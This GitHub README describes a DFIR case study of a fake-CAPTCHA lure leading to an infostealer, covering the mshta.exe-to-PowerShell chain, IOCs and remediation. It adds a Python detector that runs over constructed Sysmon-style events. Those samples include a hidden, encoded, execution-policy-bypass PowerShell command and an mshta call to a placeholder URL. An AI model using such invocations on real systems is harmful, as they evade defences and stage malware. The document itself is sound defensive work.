GitHub: yev-cyber/dfir-malware-investigation
# Fake CAPTCHA to Infostealer: DFIR Malware Investigation Case Study
This project documents the investigation methodology, evidence review, process chain analysis, IOC extraction, and defensive remediation for a fake-CAPTCHA-to-infostealer incident, without exposing sensitive internal data.
## What this project covers
- Fake CAPTCHA social engineering workflow
- mshta.exe and PowerShell execution chain analysis
- Obfuscated and deobfuscated script review
- Suspected living-off-the-land (LOTL) technique assessment
- AMSI and event logging bypass indicators
- IOC extraction and infrastructure review
- Investigation conclusions and remediation steps
## Safety and Privacy Note
This repository contains a sanitized portfolio version of a malware investigation case study. Sensitive identifiers, internal references, and operational details have been removed or generalized. The material is shared for educational and professional portfolio purposes only.
## Files
- PDF case study
- IOC summary
- Short executive summary
## Key Findings
- Suspicious fake CAPTCHA flow led to command execution behavior
- mshta.exe and PowerShell were involved in the observed chain
- Obfuscated scripting and repeated background execution suggested malicious intent
- Indicators pointed to infostealer-style objectives
- Investigation produced actionable IOCs and remediation outcomes
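As an added illustration of how the process chain in the findings above can be surfaced from endpoint telemetry, the following Python is example code written for this README, not material from the case study or this repository. It runs over a small set of constructed process-creation records (Sysmon Event ID 1 style fields; the command lines, paths, timestamps and the `placeholder.invalid` URL are all made up for the example) and flags three things the findings describe: mshta.exe spawning PowerShell, PowerShell launched with hidden-window or encoded-command switches, and the same suspicious command line repeating in the background.

```python
"""Added example: flag mshta.exe -> PowerShell chains and repeated hidden execution."""
from collections import Counter
from pathlib import PureWindowsPath

# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# Values are illustrative only and are not data from the case study.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA_PATH = r"C:\Windows\System32\mshta.exe"
EXPLORER_PATH = r"C:\Windows\explorer.exe"
STAGE_CMD = "powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgA"  # constructed

SAMPLE_EVENTS = [
    {"time": "10:00:01", "image": EXPLORER_PATH,
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    # User follows the fake CAPTCHA prompt; mshta.exe is launched from the desktop shell.
    {"time": "10:02:14", "image": MSHTA_PATH, "parent_image": EXPLORER_PATH,
     "cmdline": "mshta.exe https://placeholder.invalid/verify"},
    # mshta.exe hands off to a hidden, encoded PowerShell stage, repeated every few minutes.
    {"time": "10:02:15", "image": PS_PATH, "parent_image": MSHTA_PATH, "cmdline": STAGE_CMD},
    {"time": "10:07:15", "image": PS_PATH, "parent_image": MSHTA_PATH, "cmdline": STAGE_CMD},
    {"time": "10:12:15", "image": PS_PATH, "parent_image": MSHTA_PATH, "cmdline": STAGE_CMD},
    # Ordinary administrative PowerShell use that should not alert.
    {"time": "10:30:00", "image": PS_PATH, "parent_image": EXPLORER_PATH,
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so comparisons ignore directory and case."""
    return PureWindowsPath(path).name.lower()


def powershell_flags(cmdline: str) -> set:
    """Return the set of evasion-relevant switches present on a PowerShell command line.

    Token based rather than regex based so abbreviated switches (-w, -ep, -enc)
    are matched exactly and an argument is only consumed where one is expected.
    """
    tokens = cmdline.split()
    flags = set()
    for i, tok in enumerate(tokens):
        t = tok.lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if t in ("-w", "-windowstyle") and nxt == "hidden":
            flags.add("hidden_window")
        if t in ("-e", "-ec", "-enc", "-encodedcommand"):
            flags.add("encoded_command")
        if t in ("-ep", "-executionpolicy") and nxt == "bypass":
            flags.add("execution_policy_bypass")
        if t in ("-nop", "-noprofile"):
            flags.add("no_profile")
    return flags


def analyze(events, repeat_threshold: int = 3):
    """Walk process-creation events and return a list of alert dicts.

    Rules:
      mshta_spawned_powershell     - parent is mshta.exe, child is PowerShell
      powershell_hidden_or_encoded - PowerShell started hidden or with an encoded command
      repeated_suspicious_execution - a flagged command line recurs >= repeat_threshold times
    """
    alerts = []
    flagged_cmd_counts = Counter()
    for ev in events:
        child = basename(ev["image"])
        parent = basename(ev["parent_image"])
        if child not in POWERSHELL_IMAGES:
            continue
        flags = powershell_flags(ev["cmdline"])
        if parent == "mshta.exe":
            alerts.append({"rule": "mshta_spawned_powershell", "time": ev["time"],
                           "flags": sorted(flags), "cmdline": ev["cmdline"]})
        elif flags & {"hidden_window", "encoded_command"}:
            alerts.append({"rule": "powershell_hidden_or_encoded", "time": ev["time"],
                           "flags": sorted(flags), "cmdline": ev["cmdline"]})
        if flags:
            flagged_cmd_counts[ev["cmdline"]] += 1
    for cmd, count in flagged_cmd_counts.items():
        if count >= repeat_threshold:
            alerts.append({"rule": "repeated_suspicious_execution", "count": count, "cmdline": cmd})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The benign `-File` invocation from explorer.exe produces no alert, while each of the three mshta.exe-parented launches does, and the repeat rule fires once on the recurring encoded command line. In a real environment the same logic would be applied to Sysmon or EDR process-creation telemetry rather than the inline list, and the repeat threshold and window should be tuned to the host's normal scheduled-task activity.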